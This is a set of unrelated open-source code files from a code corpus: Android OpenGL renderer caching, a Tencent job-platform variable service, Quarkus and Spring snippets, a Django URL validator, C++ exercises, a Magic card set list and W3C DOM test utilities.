    # Store the parameter names passed to the subcircuit.
    code = subcirc_func.__code__
    num_args = code.co_argcount
    arg_names = code.co_varnames[:num_args]
    # By default, set parameters to a package to be ProtoNets. Each ProtoNet
    # remembers the package and key it belongs to so later assignment can
    # resolve it.
    for arg_name in arg_names:
        pn = ProtoNet(arg_name, circuit=None)
        pn.intfc = pckg
        pn.intfc_key = arg_name
        pckg[arg_name] = pn
    # Set any default values for the parameters.
    # Positional defaults align with the TAIL of the argument list, hence
    # the double reversed() zip.
    if getattr(subcirc_func, "__defaults__", None):
        for arg_name, dflt_value in zip(
            reversed(arg_names), reversed(subcirc_func.__defaults__)
        ):
            pckg[arg_name] = dflt_value
    # Keyword-only defaults are a plain mapping.
    if getattr(subcirc_func, "__kwdefaults__", None):
        for arg_name, dflt_value in subcirc_func.__kwdefaults__.items():
            pckg[arg_name] = dflt_value
    # Create the subcircuit function that will be called to insantiate this package.
    pckg.subcircuit = subcircuit(subcirc_func)
    # Remove the subcircuit key from the dict so it won't be passed to subcirc_func().
    del pckg["subcircuit"]
    return pckg
| 1,619 |
5,169 | <reponame>Gantios/Specs
{
"name": "ContainerManager",
"version": "2.0.0",
"summary": "Helper classes to ContainerView usage with IE in Swift.",
"description": "ContainerManager helps you with linking more than one ViewController to the same ContainerView with segues in the Interface Builder in Swift.",
"homepage": "https://github.com/brurend/ContainerManager",
"license": "MIT",
"authors": {
"brurend": "<EMAIL>"
},
"source": {
"git": "https://github.com/brurend/ContainerManager.git",
"tag": "2.0.0"
},
"platforms": {
"ios": "8.3"
},
"requires_arc": true,
"source_files": "ContainerManager/*"
}
| 226 |
726 | package org.andresoviedo.android_3d_model_engine.drawer;
import android.content.Context;
import androidx.annotation.NonNull;
import android.util.Log;
import org.andresoviedo.android_3d_model_engine.R;
import org.andresoviedo.android_3d_model_engine.model.AnimatedModel;
import org.andresoviedo.android_3d_model_engine.model.Object3DData;
import org.andresoviedo.util.io.IOUtils;
import java.io.IOException;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
/**
* Copyright 2013-2020 <EMAIL>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
* DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
* OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
*/
/**
 * Creates and caches OpenGL ES 2.0 renderers ("drawers"), pairing each request
 * with the shader program matching the requested feature set (skybox,
 * animation, lights, textures, vertex colors).
 *
 * Shader sources are loaded once, up front, from the application's raw
 * resources; compiled drawers are cached per {@link Shader} combination.
 */
public class RendererFactory {

    /**
     * shader code loaded from raw resources, keyed by resource name.
     * resources are cached on activity thread
     */
    private Map<String, String> shadersCode = new HashMap<>();

    /**
     * cache of compiled opengl drawers, one per shader combination
     */
    private Map<Shader, GLES20Renderer> drawers = new HashMap<>();

    /**
     * Discovers every raw resource via reflection on {@code R.raw} and caches
     * its contents as shader source code.
     *
     * @param context Android context used to open raw resources
     * @throws IllegalAccessException if a generated {@code R.raw} field cannot be read
     * @throws IOException            if a raw resource cannot be read
     */
    public RendererFactory(Context context) throws IllegalAccessException, IOException {

        Log.i("RendererFactory", "Discovering shaders...");
        for (Field field : R.raw.class.getFields()) {
            // the field name is the resource name; its int value is the resource id
            String shaderId = field.getName();
            Log.v("RendererFactory", "Loading shader... " + shaderId);
            int shaderResId = field.getInt(field);
            byte[] shaderBytes = IOUtils.read(context.getResources().openRawResource(shaderResId));
            shadersCode.put(shaderId, new String(shaderBytes));
        }
        Log.i("RendererFactory", "Shaders loaded: " + shadersCode.size());
    }

    /**
     * Returns a drawer able to render the object with the requested features,
     * silently downgrading any feature the object's data cannot support.
     *
     * @param obj            object to draw; may be {@code null} (feature checks then fail closed)
     * @param usingSkyBox    request the skybox shader
     * @param usingTextures  request texturing (requires texture data and a texture buffer)
     * @param usingLights    request lighting (requires a normals buffer)
     * @param usingAnimation request skeletal animation (requires an initialized animation)
     * @param drawColors     request per-vertex colors (requires a colors buffer)
     * @return the cached or newly compiled drawer, or {@code null} when the
     *         shader source could not be found
     */
    public Renderer getDrawer(Object3DData obj, boolean usingSkyBox, boolean usingTextures, boolean usingLights,
                              boolean usingAnimation, boolean drawColors) {

        // double check features: only enable what the object's data really supports
        boolean isAnimated = usingAnimation && obj instanceof AnimatedModel
                && ((AnimatedModel) obj).getAnimation() != null
                && (((AnimatedModel) obj).getAnimation()).isInitialized();
        // bugfix: original tested getNormalsBuffer() twice (duplicated condition)
        // and dereferenced obj without a null guard
        boolean isUsingLights = usingLights && obj != null && obj.getNormalsBuffer() != null;
        boolean isTextured = usingTextures && obj != null && obj.getTextureData() != null
                && obj.getTextureBuffer() != null;
        // bugfix: original tested getColorsBuffer() twice (duplicated condition)
        boolean isColoured = drawColors && obj != null && obj.getColorsBuffer() != null;

        final Shader shader = getShader(usingSkyBox, isAnimated, isUsingLights, isTextured, isColoured);

        // get cached drawer
        GLES20Renderer drawer = drawers.get(shader);
        if (drawer != null) return drawer;

        // build drawer
        String vertexShaderCode = shadersCode.get(shader.vertexShaderCode);
        String fragmentShaderCode = shadersCode.get(shader.fragmentShaderCode);
        if (vertexShaderCode == null || fragmentShaderCode == null) {
            Log.e("RendererFactory", "Shaders not found for " + shader.id);
            return null;
        }

        // experimental: inject glPointSize
        vertexShaderCode = vertexShaderCode.replace("void main(){", "void main(){\n\tgl_PointSize = 5.0;");

        // use opengl constant to dynamically set up array size in shaders. That should be >=120
        vertexShaderCode = vertexShaderCode.replace("const int MAX_JOINTS = 60;",
                "const int MAX_JOINTS = gl_MaxVertexUniformVectors > 60 ? 60 : gl_MaxVertexUniformVectors;");

        // create drawer
        Log.v("RendererFactory", "\n---------- Vertex shader ----------\n");
        Log.v("RendererFactory", vertexShaderCode);
        Log.v("RendererFactory", "---------- Fragment shader ----------\n");
        Log.v("RendererFactory", fragmentShaderCode);
        Log.v("RendererFactory", "-------------------------------------\n");
        drawer = GLES20Renderer.getInstance(shader.id, vertexShaderCode, fragmentShaderCode);

        // cache drawer
        drawers.put(shader, drawer);

        // return drawer
        return drawer;
    }

    /**
     * Maps the (already validated) feature flags to the shader implementing
     * exactly that combination. Same mapping as before, flattened for clarity.
     */
    @NonNull
    private Shader getShader(boolean isUsingSkyBox, boolean isAnimated, boolean isUsingLights, boolean isTextured,
                             boolean isColoured) {
        if (isUsingSkyBox) {
            return Shader.SKYBOX;
        }
        if (isAnimated) {
            if (isUsingLights) {
                if (isTextured) {
                    return isColoured ? Shader.ANIM_LIGHT_TEXTURE_COLORS : Shader.ANIM_LIGHT_TEXTURE;
                }
                return isColoured ? Shader.ANIM_LIGHT_COLORS : Shader.ANIM_LIGHT;
            }
            if (isTextured) {
                return isColoured ? Shader.ANIM_TEXTURE_COLORS : Shader.ANIM_TEXTURE;
            }
            return isColoured ? Shader.ANIM_COLORS : Shader.ANIM;
        }
        if (isUsingLights) {
            if (isTextured) {
                return isColoured ? Shader.LIGHT_TEXTURE_COLORS : Shader.LIGHT_TEXTURE;
            }
            return isColoured ? Shader.LIGHT_COLORS : Shader.LIGHT;
        }
        if (isTextured) {
            return isColoured ? Shader.TEXTURE_COLORS : Shader.TEXTURE;
        }
        return isColoured ? Shader.COLORS : Shader.SHADER;
    }

    /** Drawer for bounding boxes: plain feature-less shader. */
    public Renderer getBoundingBoxDrawer() {
        return getDrawer(null, false, false, false, false, false);
    }

    /** Drawer for face normals: plain feature-less shader. */
    public Renderer getFaceNormalsDrawer() {
        return getDrawer(null, false, false, false, false, false);
    }

    /** Basic feature-less shader. */
    public Renderer getBasicShader() {
        return getDrawer(null, false, false, false, false, false);
    }

    /** Skybox shader. */
    public Renderer getSkyBoxDrawer() {
        return getDrawer(null, true, false, false, false, false);
    }
}
| 3,525 |
578 | /*
* Tencent is pleased to support the open source community by making BK-JOB蓝鲸智云作业平台 available.
*
* Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
*
* BK-JOB蓝鲸智云作业平台 is licensed under the MIT License.
*
* License for BK-JOB蓝鲸智云作业平台:
* --------------------------------------------------------------------
* Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
* documentation files (the "Software"), to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
* to permit persons to whom the Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all copies or substantial portions of
* the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
* THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
* CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
package com.tencent.bk.job.execute.service.impl;
import com.tencent.bk.job.common.constant.TaskVariableTypeEnum;
import com.tencent.bk.job.execute.common.constants.StepExecuteTypeEnum;
import com.tencent.bk.job.execute.dao.StepInstanceVariableDAO;
import com.tencent.bk.job.execute.engine.model.TaskVariableDTO;
import com.tencent.bk.job.execute.engine.model.TaskVariablesAnalyzeResult;
import com.tencent.bk.job.execute.model.HostVariableValuesDTO;
import com.tencent.bk.job.execute.model.StepInstanceBaseDTO;
import com.tencent.bk.job.execute.model.StepInstanceVariableValuesDTO;
import com.tencent.bk.job.execute.model.VariableValueDTO;
import com.tencent.bk.job.execute.service.StepInstanceVariableValueService;
import com.tencent.bk.job.execute.service.TaskInstanceService;
import com.tencent.bk.job.execute.service.TaskInstanceVariableService;
import lombok.extern.slf4j.Slf4j;
import org.apache.commons.collections4.CollectionUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;
@Service
@Slf4j
public class StepInstanceVariableValueServiceImpl implements StepInstanceVariableValueService {
private final StepInstanceVariableDAO stepInstanceVariableDAO;
private final TaskInstanceService taskInstanceService;
private final TaskInstanceVariableService taskInstanceVariableService;
@Autowired
public StepInstanceVariableValueServiceImpl(StepInstanceVariableDAO stepInstanceVariableDAO,
TaskInstanceService taskInstanceService,
TaskInstanceVariableService taskInstanceVariableService) {
this.stepInstanceVariableDAO = stepInstanceVariableDAO;
this.taskInstanceService = taskInstanceService;
this.taskInstanceVariableService = taskInstanceVariableService;
}
@Override
public void saveVariableValues(StepInstanceVariableValuesDTO variableValues) {
stepInstanceVariableDAO.saveVariableValues(variableValues);
}
@Override
public List<StepInstanceVariableValuesDTO> computeOutputVariableValuesForAllStep(long taskInstanceId) {
List<StepInstanceVariableValuesDTO> resultStepInstanceVariableValuesList = new ArrayList<>();
List<StepInstanceBaseDTO> stepInstanceList =
taskInstanceService.listStepInstanceByTaskInstanceId(taskInstanceId);
if (CollectionUtils.isEmpty(stepInstanceList)) {
log.info("Step instance is empty! taskInstanceId: {}", taskInstanceId);
return resultStepInstanceVariableValuesList;
}
List<StepInstanceVariableValuesDTO> stepInstanceVariableValuesList =
stepInstanceVariableDAO.listStepOutputVariableValuesByTaskInstanceId(taskInstanceId);
List<TaskVariableDTO> globalVars = taskInstanceVariableService.getByTaskInstanceId(taskInstanceId);
if (CollectionUtils.isEmpty(globalVars)) {
return resultStepInstanceVariableValuesList;
}
Map<String, VariableValueDTO> globalVarValueMap = new HashMap<>();
initGlobalVarMap(globalVars, globalVarValueMap);
stepInstanceList.forEach(stepInstance -> {
if (!StepExecuteTypeEnum.EXECUTE_SCRIPT.getValue().equals(stepInstance.getExecuteType())) {
return;
}
StepInstanceVariableValuesDTO resultStepInstanceVariableValues = new StepInstanceVariableValuesDTO();
resultStepInstanceVariableValues.setStepInstanceId(stepInstance.getId());
resultStepInstanceVariableValues.setExecuteCount(stepInstance.getExecuteCount());
List<VariableValueDTO> globalVarValues = new ArrayList<>();
List<StepInstanceVariableValuesDTO> variableValuesForStep = stepInstanceVariableValuesList.stream()
.filter(stepInstanceVariableValues ->
stepInstanceVariableValues.getStepInstanceId() == stepInstance.getId())
.sorted(Comparator.comparingInt(StepInstanceVariableValuesDTO::getExecuteCount))
.collect(Collectors.toList());
variableValuesForStep.forEach(variableValues -> {
if (CollectionUtils.isNotEmpty(variableValues.getGlobalParams())) {
variableValues.getGlobalParams().forEach(globalVar -> globalVarValueMap.put(globalVar.getName(),
globalVar));
}
});
if (!globalVarValueMap.isEmpty()) {
globalVarValueMap.forEach((varName, value) -> globalVarValues.add(value));
resultStepInstanceVariableValues.setGlobalParams(globalVarValues);
resultStepInstanceVariableValues.setGlobalParamsMap(new HashMap<>(globalVarValueMap));
}
resultStepInstanceVariableValuesList.add(resultStepInstanceVariableValues);
});
return resultStepInstanceVariableValuesList;
}
@Override
public StepInstanceVariableValuesDTO computeInputStepInstanceVariableValues(long taskInstanceId,
long stepInstanceId,
List<TaskVariableDTO> taskVariables) {
TaskVariablesAnalyzeResult variablesAnalyzeResult = new TaskVariablesAnalyzeResult(taskVariables);
StepInstanceVariableValuesDTO inputStepInstanceVariableValues = new StepInstanceVariableValuesDTO();
inputStepInstanceVariableValues.setTaskInstanceId(taskInstanceId);
inputStepInstanceVariableValues.setStepInstanceId(stepInstanceId);
if (!variablesAnalyzeResult.isExistAnyVar()) {
return inputStepInstanceVariableValues;
}
List<HostVariableValuesDTO> namespaceVarValues = new ArrayList<>();
List<VariableValueDTO> globalVarValues = new ArrayList<>();
Map<String, VariableValueDTO> globalVarValueMap = new HashMap<>();
Map<String, Map<String, VariableValueDTO>> namespaceVarValueMap = new HashMap<>();
inputStepInstanceVariableValues.setNamespaceParams(namespaceVarValues);
inputStepInstanceVariableValues.setNamespaceParamsMap(namespaceVarValueMap);
inputStepInstanceVariableValues.setGlobalParams(globalVarValues);
inputStepInstanceVariableValues.setGlobalParamsMap(globalVarValueMap);
initGlobalVarMap(taskVariables, globalVarValueMap);
if (variablesAnalyzeResult.isExistOnlyConstVar()) {
if (!globalVarValueMap.isEmpty()) {
globalVarValueMap.forEach((paramName, param) -> globalVarValues.add(param));
}
return inputStepInstanceVariableValues;
}
List<StepInstanceVariableValuesDTO> stepInstanceVariableValuesList =
stepInstanceVariableDAO.listSortedPreStepOutputVariableValues(taskInstanceId, stepInstanceId);
if (CollectionUtils.isEmpty(stepInstanceVariableValuesList)) {
if (!globalVarValueMap.isEmpty()) {
globalVarValueMap.forEach((paramName, param) -> globalVarValues.add(param));
}
return inputStepInstanceVariableValues;
}
stepInstanceVariableValuesList.forEach(stepInstanceVariableValues -> {
List<VariableValueDTO> stepGlobalParams = stepInstanceVariableValues.getGlobalParams();
if (CollectionUtils.isNotEmpty(stepGlobalParams)) {
stepGlobalParams.forEach(globalParam -> globalVarValueMap.put(globalParam.getName(), globalParam));
}
if (variablesAnalyzeResult.isExistNamespaceVar()) {
List<HostVariableValuesDTO> stepNamespaceParams = stepInstanceVariableValues.getNamespaceParams();
if (CollectionUtils.isNotEmpty(stepNamespaceParams)) {
stepNamespaceParams.forEach(hostVariableValues -> {
if (CollectionUtils.isEmpty(hostVariableValues.getValues())) {
return;
}
Map<String, VariableValueDTO> hostVariables = namespaceVarValueMap.computeIfAbsent(
hostVariableValues.getIp(), k -> new HashMap<>());
hostVariableValues.getValues().forEach(variable -> hostVariables.put(variable.getName(),
variable));
});
}
}
});
if (!globalVarValueMap.isEmpty()) {
globalVarValueMap.forEach((paramName, param) -> globalVarValues.add(param));
}
if (variablesAnalyzeResult.isExistNamespaceVar()) {
namespaceVarValueMap.forEach((ip, param) -> {
HostVariableValuesDTO hostVariableValues = new HostVariableValuesDTO();
hostVariableValues.setIp(ip);
if (param != null && !param.isEmpty()) {
List<VariableValueDTO> values = new ArrayList<>();
param.forEach((paramName, paramValue) -> values.add(paramValue));
hostVariableValues.setValues(values);
}
namespaceVarValues.add(hostVariableValues);
});
}
return inputStepInstanceVariableValues;
}
private void initGlobalVarMap(List<TaskVariableDTO> taskVariables,
Map<String, VariableValueDTO> globalVarValueMap) {
taskVariables.forEach(taskVariable -> {
VariableValueDTO variableValue = new VariableValueDTO();
variableValue.setName(taskVariable.getName());
variableValue.setType(taskVariable.getType());
variableValue.setValue(taskVariable.getValue());
variableValue.setServerValue(taskVariable.getTargetServers());
if (TaskVariableTypeEnum.valOf(taskVariable.getType()) != TaskVariableTypeEnum.NAMESPACE) {
globalVarValueMap.put(variableValue.getName(), variableValue);
}
});
}
}
| 4,479 |
// Returns twice the given value.
int h_chain(int x) {
  const int doubled = x + x;
  return doubled;
}
namespace chns {

// Forward declaration; the definition lives in another translation unit.
int chf3(int x);

// Thin wrapper that delegates straight to chf3.
int chf2(int x) {
  return chf3(x);
}

class chcls {
 public:
  int chf4(int x);
};

// Returns three times the given value.
int chcls::chf4(int x) {
  const int tripled = 3 * x;
  return tripled;
}

}  // namespace chns
| 105 |
10,225 | <gh_stars>1000+
package io.quarkus.vertx.web.runtime;
import java.util.function.Consumer;
import io.vertx.ext.web.RoutingContext;
/**
 * Failure callback for a Uni subscription: forwards any emitted error to the
 * associated Vert.x routing context.
 */
public final class UniFailureCallback implements Consumer<Throwable> {

    /** Routing context that receives the failure. */
    private final RoutingContext context;

    /**
     * @param context routing context to fail when an error is emitted
     */
    public UniFailureCallback(RoutingContext context) {
        this.context = context;
    }

    /**
     * Propagates the given failure to the routing context.
     */
    @Override
    public void accept(Throwable failure) {
        context.fail(failure);
    }
}
| 151 |
32,544 | <gh_stars>1000+
package com.baeldung.undeclared;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class UndeclaredApplication {

    /**
     * Entry point: boots the Spring application context.
     *
     * @param args command-line arguments forwarded to Spring Boot
     */
    public static void main(String[] args) {
        final Class<UndeclaredApplication> applicationClass = UndeclaredApplication.class;
        SpringApplication.run(applicationClass, args);
    }
}
| 111 |
1,312 | from django.conf import settings
from django.core import validators
class BookmarkURLValidator(validators.URLValidator):
    """Django URL validator that can be switched off via settings.

    When ``LD_DISABLE_URL_VALIDATION`` is truthy, validation becomes a
    no-op. This makes it possible to toggle URL validation dynamically,
    which helps with testing.
    """

    def __call__(self, value):
        # Only delegate to Django's URLValidator when validation is enabled.
        if not settings.LD_DISABLE_URL_VALIDATION:
            super().__call__(value)
545 | <reponame>FWangTrading/Cpp-Primer-5th-Exercises
#include <iostream>
// Wrapper type demonstrating user-defined conversions to and from int.
class SmallInt {
  friend SmallInt operator+(const SmallInt&, const SmallInt&);
public:
  // Converting constructor: stores the given value.
  // bugfix: the original discarded its argument and left `val`
  // uninitialized, so reading it through operator int() was undefined
  // behavior.
  SmallInt(int i = 0) : val(i) { } // conversion from int
  operator int() const { return val; } // conversion to int
private:
  std::size_t val;
};
// Friend addition: announces which overload was selected, then yields a
// default-constructed SmallInt (the operands are deliberately unused —
// this exists to demonstrate overload resolution).
SmallInt operator+(const SmallInt& lhs, const SmallInt& rhs) {
  (void)lhs;
  (void)rhs;
  std::cout << "operator+(const SmallInt&, const SmallInt&)" << std::endl;
  SmallInt result;
  return result;
}
// Demonstrates how user-defined conversions interact with overload
// resolution for operator+.
int main() {
  SmallInt s1;
  //double d = s1 + 3.14; // Error: ambiguous —
  // both `operator+(const SmallInt&, const SmallInt&)` and
  // `built-in operator+(int, double)` are viable functions
  double d = static_cast<double>(s1) + 3.14; // OK
  // We can use `static_cast` to convert `s1` from `SmallInt` to `double`,
  // forcing the built-in operator+(double, double).
  double d2 = s1 + SmallInt(3.14); // OK, but loses precision
  // Or use the conversion constructor to convert `3.14` from `double` to
  // `SmallInt`, selecting the friend operator+ (which prints a message).
  return 0;
}
| 316 |
1,444 | <reponame>amc8391/mage
package mage.sets;
import mage.cards.ExpansionSet;
import mage.constants.Rarity;
import mage.constants.SetType;
/**
* https://scryfall.com/sets/md1
*/
/**
 * Card registry for the "Modern Event Deck 2014" promotional set (code MD1).
 * Implemented as a singleton, like the other ExpansionSet subclasses; the
 * constructor registers every card of the deck with its collector number,
 * rarity, and implementing class.
 */
public class ModernEventDeck2014 extends ExpansionSet {

    // Eagerly-created singleton instance.
    private static final ModernEventDeck2014 instance = new ModernEventDeck2014();

    /** @return the shared singleton instance of this set */
    public static ModernEventDeck2014 getInstance() {
        return instance;
    }

    private ModernEventDeck2014() {
        super("Modern Event Deck 2014", "MD1", ExpansionSet.buildDate(2014, 5, 30), SetType.PROMOTIONAL);
        // This product is a fixed deck: no boosters, but it does contain basic lands.
        this.hasBoosters = false;
        this.hasBasicLands = true;
        cards.add(new SetCardInfo("Burrenton Forge-Tender", 22, Rarity.UNCOMMON, mage.cards.b.BurrentonForgeTender.class));
        cards.add(new SetCardInfo("Caves of Koilos", 14, Rarity.RARE, mage.cards.c.CavesOfKoilos.class));
        cards.add(new SetCardInfo("City of Brass", 15, Rarity.RARE, mage.cards.c.CityOfBrass.class));
        cards.add(new SetCardInfo("Dismember", 25, Rarity.UNCOMMON, mage.cards.d.Dismember.class));
        cards.add(new SetCardInfo("Duress", 23, Rarity.COMMON, mage.cards.d.Duress.class));
        cards.add(new SetCardInfo("Elspeth, Knight-Errant", 13, Rarity.MYTHIC, mage.cards.e.ElspethKnightErrant.class));
        cards.add(new SetCardInfo("Ghost Quarter", 26, Rarity.UNCOMMON, mage.cards.g.GhostQuarter.class));
        cards.add(new SetCardInfo("Honor of the Pure", 6, Rarity.RARE, mage.cards.h.HonorOfThePure.class));
        cards.add(new SetCardInfo("Inquisition of Kozilek", 4, Rarity.UNCOMMON, mage.cards.i.InquisitionOfKozilek.class));
        cards.add(new SetCardInfo("Intangible Virtue", 7, Rarity.UNCOMMON, mage.cards.i.IntangibleVirtue.class));
        cards.add(new SetCardInfo("Isolated Chapel", 16, Rarity.RARE, mage.cards.i.IsolatedChapel.class));
        cards.add(new SetCardInfo("Kataki, War's Wage", 24, Rarity.RARE, mage.cards.k.KatakiWarsWage.class));
        cards.add(new SetCardInfo("Lingering Souls", 11, Rarity.UNCOMMON, mage.cards.l.LingeringSouls.class));
        cards.add(new SetCardInfo("Path to Exile", 3, Rarity.UNCOMMON, mage.cards.p.PathToExile.class));
        cards.add(new SetCardInfo("Plains", 19, Rarity.LAND, mage.cards.basiclands.Plains.class));
        cards.add(new SetCardInfo("Raise the Alarm", 8, Rarity.COMMON, mage.cards.r.RaiseTheAlarm.class));
        cards.add(new SetCardInfo("Relic of Progenitus", 21, Rarity.UNCOMMON, mage.cards.r.RelicOfProgenitus.class));
        cards.add(new SetCardInfo("Shrine of Loyal Legions", 5, Rarity.UNCOMMON, mage.cards.s.ShrineOfLoyalLegions.class));
        cards.add(new SetCardInfo("Soul Warden", 1, Rarity.COMMON, mage.cards.s.SoulWarden.class));
        cards.add(new SetCardInfo("Spectral Procession", 12, Rarity.UNCOMMON, mage.cards.s.SpectralProcession.class));
        cards.add(new SetCardInfo("Swamp", 20, Rarity.LAND, mage.cards.basiclands.Swamp.class));
        cards.add(new SetCardInfo("Sword of Feast and Famine", 10, Rarity.MYTHIC, mage.cards.s.SwordOfFeastAndFamine.class));
        cards.add(new SetCardInfo("Tidehollow Sculler", 2, Rarity.UNCOMMON, mage.cards.t.TidehollowSculler.class));
        cards.add(new SetCardInfo("Vault of the Archangel", 17, Rarity.RARE, mage.cards.v.VaultOfTheArchangel.class));
        cards.add(new SetCardInfo("Windbrisk Heights", 18, Rarity.RARE, mage.cards.w.WindbriskHeights.class));
        cards.add(new SetCardInfo("Zealous Persecution", 9, Rarity.UNCOMMON, mage.cards.z.ZealousPersecution.class));
    }
}
| 1,362 |
568 | //
// Copyright (c) 2009, <NAME>
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//
#ifndef RL_UTIL_IO_BASICIOSRESTORER_H
#define RL_UTIL_IO_BASICIOSRESTORER_H
#include <ios>
namespace rl
{
	namespace util
	{
		namespace io
		{
			/**
			 * RAII guard that snapshots the full formatting and error state
			 * of a std::basic_ios on construction and restores it on
			 * destruction: exception mask, fill character, format flags,
			 * precision, stream buffer, error state, tied stream and width.
			 */
			template<typename CharT, typename Traits = ::std::char_traits<CharT>>
			class BasicIosRestorer
			{
			public:
				typedef ::std::basic_ios<CharT, Traits> value_type;
				
				explicit BasicIosRestorer(value_type& stream) :
					savedExceptions(stream.exceptions()),
					savedFill(stream.fill()),
					savedFlags(stream.flags()),
					stream(stream),
					savedPrecision(stream.precision()),
					savedRdbuf(stream.rdbuf()),
					savedRdstate(stream.rdstate()),
					savedTie(stream.tie()),
					savedWidth(stream.width())
				{
				}
				
				~BasicIosRestorer()
				{
					// Restore everything captured at construction, in the
					// same order as the original implementation.
					this->stream.exceptions(this->savedExceptions);
					this->stream.fill(this->savedFill);
					this->stream.flags(this->savedFlags);
					this->stream.precision(this->savedPrecision);
					this->stream.rdbuf(this->savedRdbuf);
					this->stream.clear(this->savedRdstate);
					this->stream.tie(this->savedTie);
					this->stream.width(this->savedWidth);
				}
				
			protected:
				
			private:
				// Declaration order matches the constructor's init list.
				const typename value_type::iostate savedExceptions;
				
				const typename value_type::char_type savedFill;
				
				const typename value_type::fmtflags savedFlags;
				
				value_type& stream;
				
				const ::std::streamsize savedPrecision;
				
				::std::basic_streambuf<CharT, Traits>* savedRdbuf;
				
				const typename value_type::iostate savedRdstate;
				
				::std::basic_ostream<CharT, Traits>* savedTie;
				
				const ::std::streamsize savedWidth;
			};
		}
	}
}
#endif // RL_UTIL_IO_BASICIOSRESTORER_H
| 1,116 |
2,151 | <reponame>aiw-google/openweave-core
/*
* Copyright (c) 2004 World Wide Web Consortium, (Massachusetts Institute of
* Technology, Institut National de Recherche en Informatique et en
* Automatique, Keio University). All Rights Reserved. This program is
* distributed under the W3C's Software Intellectual Property License. This
* program is distributed in the hope that it will be useful, but WITHOUT ANY
* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See W3C License
* http://www.w3.org/Consortium/Legal/ for more details.
*/
package org.w3c.domts;
import java.util.ArrayList;
import java.util.List;
import org.w3c.dom.Node;
import org.w3c.dom.UserDataHandler;
/**
* This is a utility implementation of UserDataHandler that captures all
* notifications
*/
/**
 * This is a utility implementation of UserDataHandler that captures all
 * notifications so tests can inspect them later.
 *
 * Improvement: the raw {@code List}/{@code ArrayList} types were replaced
 * with their generic forms (erasure-compatible, so callers are unaffected).
 */
public class UserDataMonitor
    implements UserDataHandler {

  /** All notifications received so far, in arrival order. */
  private final List<UserDataNotification> notifications =
      new ArrayList<UserDataNotification>();

  /**
   * Public constructor
   *
   */
  public UserDataMonitor() {
  }

  /**
   * Implementation of UserDataHandler.handle. Creates a UserDataNotification
   * for later testing
   *
   * @param operation
   *          See org.w3c.dom.UserDataHandler
   * @param key
   *          See org.w3c.dom.UserDataHandler
   * @param data
   *          See org.w3c.dom.UserDataHandler
   * @param src
   *          See org.w3c.dom.UserDataHandler
   * @param dst
   *          See org.w3c.dom.UserDataHandler
   */
  public void handle(
      short operation,
      String key,
      Object data,
      Node src,
      Node dst) {
    notifications.add(
        new UserDataNotification(operation, key, data, src, dst));
  }

  /**
   * Gets list of notifications
   *
   * @return defensive copy of the notifications received so far, may not be null.
   */
  public final List<UserDataNotification> getAllNotifications() {
    return new ArrayList<UserDataNotification>(notifications);
  }
}
| 647 |
496 | <filename>src/mydis/Operator.cpp
/*******************************************************************************
* Project: Nebula
* @file Operator.cpp
